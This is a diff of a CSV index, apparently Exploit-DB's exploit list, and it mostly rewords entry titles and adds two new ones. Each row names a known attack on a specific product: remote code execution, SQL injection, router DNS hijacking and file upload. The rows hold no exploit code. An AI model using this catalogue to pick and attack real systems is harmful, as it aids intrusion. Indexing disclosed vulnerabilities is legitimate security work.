42074,exploits/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,webapps,hardware, 42075,exploits/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",webapps,hardware, -42093,exploits/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution",2017-05-30,"Simone Margaritelli",webapps,php,8181 +42093,exploits/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Root Remote Code Execution",2017-05-30,"Simone Margaritelli",webapps,php,8181 42094,exploits/php/webapps/42094.txt,"Piwigo Plugin Facetag 0.0.3 - SQL Injection",2017-05-30,"Touhid M.Shaikh",webapps,php, 42095,exploits/php/webapps/42095.txt,"OV3 Online Administration 3.0 - Directory Traversal",2017-05-31,LiquidWorm,webapps,php, 42096,exploits/php/webapps/42096.txt,"OV3 Online Administration 3.0 - Remote Code Execution",2017-05-31,LiquidWorm,webapps,php, @@ -38690,12 +38691,12 @@ id,file,description,date,author,type,platform,port 42184,exploits/aspx/webapps/42184.txt,"KBVault MySQL 0.16a - Arbitrary File Upload",2017-06-14,"Fatih Emiral",webapps,aspx, 42185,exploits/php/webapps/42185.txt,"Joomla! Component JoomRecipe 1.0.3 - SQL Injection",2017-06-15,EziBilisim,webapps,php, 42187,exploits/linux/webapps/42187.py,"IBM Informix Dynamic Server - Code Injection / Remote Code Execution",2017-06-16,IMgod,webapps,linux, -42192,exploits/hardware/webapps/42192.sh,"iBall Baton iB-WRA150N - Unauthenticated DNS Change",2017-06-16,"Todor Donev",webapps,hardware, +42192,exploits/hardware/webapps/42192.sh,"iBall Baton iB-WRA150N - DNS Change",2017-06-16,"Todor Donev",webapps,hardware, 42193,exploits/php/webapps/42193.txt,"nuevoMailer 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",webapps,php, -42194,exploits/hardware/webapps/42194.sh,"UTstarcom WA3002G4 - Unauthenticated DNS Change",2017-06-17,"Todor Donev",webapps,hardware, -42195,exploits/hardware/webapps/42195.sh,"D-Link DSL-2640U - Unauthenticated DNS Change",2017-06-17,"Todor Donev",webapps,hardware, -42196,exploits/hardware/webapps/42196.sh,"Beetel BCM96338 Router - Unauthenticated DNS Change",2017-06-17,"Todor Donev",webapps,hardware, -42197,exploits/hardware/webapps/42197.sh,"D-Link DSL-2640B ADSL Router - 'dnscfg' Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",webapps,hardware, +42194,exploits/hardware/webapps/42194.sh,"UTstarcom WA3002G4 - DNS Change",2017-06-17,"Todor Donev",webapps,hardware, +42195,exploits/hardware/webapps/42195.sh,"D-Link DSL-2640U - DNS Change",2017-06-17,"Todor Donev",webapps,hardware, +42196,exploits/hardware/webapps/42196.sh,"Beetel BCM96338 Router - DNS Change",2017-06-17,"Todor Donev",webapps,hardware, +42197,exploits/hardware/webapps/42197.sh,"D-Link DSL-2640B ADSL Router - 'dnscfg' Remote DNS Change",2017-06-18,"Todor Donev",webapps,hardware, 42205,exploits/php/webapps/42205.html,"WonderCMS 2.1.0 - Cross-Site Request Forgery",2017-06-19,"Ehsan Hosseini",webapps,php, 42221,exploits/php/webapps/42221.py,"PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution",2017-06-21,phackt_ul,webapps,php, 42252,exploits/hardware/webapps/42252.txt,"Eltek SmartPack - Backdoor Account",2017-06-26,"Saeed reza Zamanian",webapps,hardware, @@ -38796,7 +38797,7 @@ id,file,description,date,author,type,platform,port 42489,exploits/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 42490,exploits/php/webapps/42490.txt,"LiveSales 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 42491,exploits/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, -42519,exploits/jsp/webapps/42519.txt,"Symantec Messaging Gateway 10.6.3-2 - Unauthenticated Root Remote Command Execution",2017-08-18,"Philip Pettersson",webapps,jsp, +42519,exploits/jsp/webapps/42519.txt,"Symantec Messaging Gateway 10.6.3-2 - Root Remote Command Execution",2017-08-18,"Philip Pettersson",webapps,jsp, 42492,exploits/php/webapps/42492.txt,"Joomla! Component Appointment 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 42493,exploits/php/webapps/42493.txt,"Joomla! Component Twitch Tv 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 42494,exploits/php/webapps/42494.txt,"Joomla! Component KissGallery 1.0.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, @@ -39038,7 +39039,7 @@ id,file,description,date,author,type,platform,port 43018,exploits/windows/webapps/43018.html,"ZKTime Web Software 2.0 - Cross-Site Request Forgery",2017-08-18,"Arvind V",webapps,windows, 43019,exploits/windows/webapps/43019.txt,"ZKTime Web Software 2.0 - Improper Access Restrictions",2017-08-18,"Arvind V",webapps,windows, 43021,exploits/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",webapps,python, -43022,exploits/hardware/webapps/43022.py,"TP-Link WR940N - Authenticated Remote Code",2017-10-17,"Fidus InfoSecurity",webapps,hardware, +43022,exploits/hardware/webapps/43022.py,"TP-Link WR940N - (Authenticated) Remote Code",2017-10-17,"Fidus InfoSecurity",webapps,hardware, 43024,exploits/multiple/webapps/43024.txt,"Logitech Media Server - Cross-Site Scripting",2017-10-14,"Thiago Sena",webapps,multiple, 43027,exploits/php/webapps/43027.txt,"CometChat < 6.2.0 BETA 1 - Local File Inclusion",2017-10-22,Paradoxis,webapps,php, 43028,exploits/php/webapps/43028.py,"Kaltura < 13.2.0 - Remote Code Execution",2017-10-23,"Robin Verton",webapps,php, @@ -39215,7 +39216,7 @@ id,file,description,date,author,type,platform,port 43315,exploits/php/webapps/43315.txt,"Vanguard 1.4 - Arbitrary File Upload",2017-12-11,"Ihsan Sencan",webapps,php, 43316,exploits/php/webapps/43316.txt,"Vanguard 1.4 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, 43323,exploits/php/webapps/43323.txt,"Joomla! Component JBuildozer 1.4.1 - 'appid' SQL Injection",2017-12-12,"Ihsan Sencan",webapps,php,80 -43324,exploits/php/webapps/43324.txt,"Accesspress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload",2017-12-12,"Colette Chamberland",webapps,php,80 +43324,exploits/php/webapps/43324.txt,"Accesspress Anonymous Post Pro < 3.2.0 - Arbitrary File Upload",2017-12-12,"Colette Chamberland",webapps,php,80 43329,exploits/php/webapps/43329.txt,"Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection",2017-12-13,"Ihsan Sencan",webapps,php, 43330,exploits/php/webapps/43330.txt,"Joomla! Component JEXTN Video Gallery 3.0.5 - 'id' SQL Injection",2017-12-13,"Ihsan Sencan",webapps,php, 43332,exploits/cgi/webapps/43332.txt,"Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read",2017-12-13,"Jakub Palaczynski",webapps,cgi,443 @@ -39272,7 +39273,7 @@ id,file,description,date,author,type,platform,port 44320,exploits/hardware/webapps/44320.txt,"Coship RT3052 Wireless Router - Persistent Cross-Site Scripting",2018-03-20,"Sayan Chatterjee",webapps,hardware, 44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple, 44328,exploits/xml/webapps/44328.py,"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass",2018-03-23,Matamorphosis,webapps,xml, -44346,exploits/php/webapps/44346.rb,"ClipBucket - beats_uploader Unauthenticated Arbitrary File Upload (Metasploit)",2018-03-27,Metasploit,webapps,php, +44346,exploits/php/webapps/44346.rb,"ClipBucket - 'beats_uploader' Arbitrary File Upload (Metasploit)",2018-03-27,Metasploit,webapps,php, 44335,exploits/hardware/webapps/44335.js,"TL-WR720N 150Mbps Wireless N Router - Cross-Site Request Forgery",2018-03-23,"Mans van Someren",webapps,hardware, 44336,exploits/php/webapps/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,webapps,php, 44339,exploits/php/webapps/44339.txt,"MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting",2018-03-23,0xB9,webapps,php, @@ -39299,7 +39300,7 @@ id,file,description,date,author,type,platform,port 44377,exploits/asp/webapps/44377.txt,"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp, 44378,exploits/php/webapps/44378.txt,"D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass",2018-03-30,"Gem George",webapps,php, 44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp, -44379,exploits/php/webapps/44379.rb,"Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit)",2018-03-30,"Touhid M.Shaikh",webapps,php, +44379,exploits/php/webapps/44379.rb,"Vtiger CRM 6.3.0 - (Authenticated) Arbitrary File Upload (Metasploit)",2018-03-30,"Touhid M.Shaikh",webapps,php, 44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp, 44383,exploits/php/webapps/44383.html,"Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)",2018-04-02,"Samrat Das",webapps,php, 44384,exploits/php/webapps/44384.txt,"WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php, @@ -39374,25 +39375,25 @@ id,file,description,date,author,type,platform,port 44513,exploits/php/webapps/44513.py,"Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass",2018-04-24,devcoinfet,webapps,php, 44515,exploits/php/webapps/44515.py,"Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure",2018-04-24,"Berk Cem Göksel",webapps,php, 44520,exploits/php/webapps/44520.html,"WordPress Plugin Woo Import Export 1.0 - Arbitrary File Deletion",2018-04-24,"Lenon Leite",webapps,php,80 -44542,exploits/php/webapps/44542.txt,"Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC)",2018-04-25,Blaklis,webapps,php, +44542,exploits/php/webapps/44542.txt,"Drupal < 7.58 - 'drupalgeddon3' (Authenticated) Remote Code Execution (PoC)",2018-04-25,Blaklis,webapps,php, 44531,exploits/java/webapps/44531.txt,"WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting",2018-04-24,"SEC Consult",webapps,java, 44535,exploits/php/webapps/44535.txt,"Blog Master Pro 1.0 - CSV Injection",2018-04-25,8bitsec,webapps,php, 44536,exploits/php/webapps/44536.txt,"HRSALE The Ultimate HRM 1.0.2 - CSV Injection",2018-04-25,8bitsec,webapps,php, 44537,exploits/php/webapps/44537.txt,"HRSALE The Ultimate HRM 1.0.2 - 'award_id' SQL Injection",2018-04-25,8bitsec,webapps,php, -44538,exploits/php/webapps/44538.txt,"HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross-Site Scripting",2018-04-25,8bitsec,webapps,php, +44538,exploits/php/webapps/44538.txt,"HRSALE The Ultimate HRM 1.0.2 - (Authenticated) Cross-Site Scripting",2018-04-25,8bitsec,webapps,php, 44539,exploits/php/webapps/44539.txt,"HRSALE The Ultimate HRM 1.0.2 - Local File Inclusion",2018-04-25,8bitsec,webapps,php, -44543,exploits/linux/webapps/44543.txt,"Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution",2018-04-26,"Alessio Sergi",webapps,linux, +44543,exploits/linux/webapps/44543.txt,"Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution",2018-04-26,"Alessio Sergi",webapps,linux, 44544,exploits/php/webapps/44544.php,"WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion",2018-04-26,Wadeek,webapps,php, 44545,exploits/linux/webapps/44545.py,"SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response",2018-04-26,"Sven Fassbender",webapps,linux, 44546,exploits/php/webapps/44546.txt,"October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting",2018-04-26,0xB9,webapps,php, 44547,exploits/php/webapps/44547.txt,"MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting",2018-04-26,0xB9,webapps,php,80 -44548,exploits/php/webapps/44548.py,"GitList 0.6 - Unauthenticated Remote Code Execution",2018-04-26,"Kacper Szurek",webapps,php, -44550,exploits/hardware/webapps/44550.txt,"TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Unauthenticated Remote Reboot",2018-04-26,Wadeek,webapps,hardware, +44548,exploits/php/webapps/44548.py,"GitList 0.6 - Remote Code Execution",2018-04-26,"Kacper Szurek",webapps,php, +44550,exploits/hardware/webapps/44550.txt,"TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Remote Reboot",2018-04-26,Wadeek,webapps,hardware, 44551,exploits/php/webapps/44551.txt,"Frog CMS 0.9.5 - Persistent Cross-Site Scripting",2018-04-26,"Wenming Jiang",webapps,php,80 -44557,exploits/php/webapps/44557.rb,"Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit)",2018-04-30,SixP4ck3r,webapps,php, +44557,exploits/php/webapps/44557.rb,"Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)",2018-04-30,SixP4ck3r,webapps,php, 44559,exploits/php/webapps/44559.txt,"WordPress Plugin Form Maker 1.12.20 - CSV Injection",2018-04-30,"Sairam Jetty",webapps,php, 44560,exploits/php/webapps/44560.py,"Nagios XI 5.2.6 < 5.2.9 / 5.3 / 5.4 - Chained Remote Root",2018-04-30,"Jared Arave",webapps,php, -44563,exploits/php/webapps/44563.txt,"WordPress Plugin Responsive Cookie Consent 1.7 / 1.6 / 1.5 - Authenticated Persistent Cross-Site Scripting",2018-05-01,B0UG,webapps,php, +44563,exploits/php/webapps/44563.txt,"WordPress Plugin Responsive Cookie Consent 1.7 / 1.6 / 1.5 - (Authenticated) Persistent Cross-Site Scripting",2018-05-01,B0UG,webapps,php, 44567,exploits/php/webapps/44567.txt,"Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery",2018-05-02,"Qian Wu_ Bo Wang_ Jiawang Zhang",webapps,php,80 44580,exploits/hardware/webapps/44580.txt,"DLINK DCS-5020L - Remote Code Execution (PoC)",2018-03-27,"Fidus InfoSecurity",webapps,hardware, 44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple, @@ -39408,7 +39409,7 @@ id,file,description,date,author,type,platform,port 44618,exploits/php/webapps/44618.txt,"WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php, 44621,exploits/php/webapps/44621.txt,"Monstra CMS 3.0.4 - Remote Code Execution",2018-05-14,JameelNabbo,webapps,php, 44622,exploits/php/webapps/44622.txt,"XATABoost 1.0.0 - SQL Injection",2018-05-14,MgThuraMoeMyint,webapps,php, -44623,exploits/multiple/webapps/44623.txt,"JasperReports - Authenticated File Read",2018-05-03,"Hector Monsegur",webapps,multiple, +44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple, 44624,exploits/php/webapps/44624.txt,"MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery",2018-05-16,0xB9,webapps,php, 44625,exploits/php/webapps/44625.txt,"VirtueMart 3.1.14 - Persistent Cross-Site Scripting",2018-05-16,"Mattia Furlani",webapps,php, 44626,exploits/windows/webapps/44626.txt,"Rockwell Scada System 27.011 - Cross-Site Scripting",2018-05-16,t4rkd3vilz,webapps,windows, @@ -39544,6 +39545,7 @@ id,file,description,date,author,type,platform,port 44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php, 44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware, 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux, +44949,exploits/php/webapps/44949.txt,"Wordpress < 4.9.6 - (Authenticated) Arbitrary File Deletion",2018-06-27,VulnSpy,webapps,php, 44943,exploits/php/webapps/44943.txt,"WordPress Plugin iThemes Security < 7.0.3 - SQL Injection",2018-06-25,"Çlirim Emini",webapps,php,80 44945,exploits/java/webapps/44945.txt,"Liferay Portal < 7.0.4 - Server-Side Request Forgery",2018-06-26,"Mehmet Ince",webapps,java,80 44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php, @@ -39567,6 +39569,7 @@ id,file,description,date,author,type,platform,port 44882,exploits/php/webapps/44882.txt,"Canon PrintMe EFI - Cross-Site Scripting",2018-06-12,"Huy Kha",webapps,php, 44883,exploits/php/webapps/44883.txt,"WordPress Plugin Google Map < 4.0.4 - SQL Injection",2018-06-12,defensecode,webapps,php, 44884,exploits/php/webapps/44884.txt,"WordPress Plugin Ultimate Form Builder Lite < 1.3.7 - SQL Injection",2018-06-12,defensecode,webapps,php, +44951,exploits/linux/webapps/44951.py,"HPE VAN SDN 2.7.18.0503 - Remote Root",2018-06-27,KoreLogic,webapps,linux,8443 44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php, 44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php, 44893,exploits/php/webapps/44893.php,"Joomla Component Ek Rishta 2.10 - SQL Injection",2018-06-14,"Guilherme Assmann",webapps,php,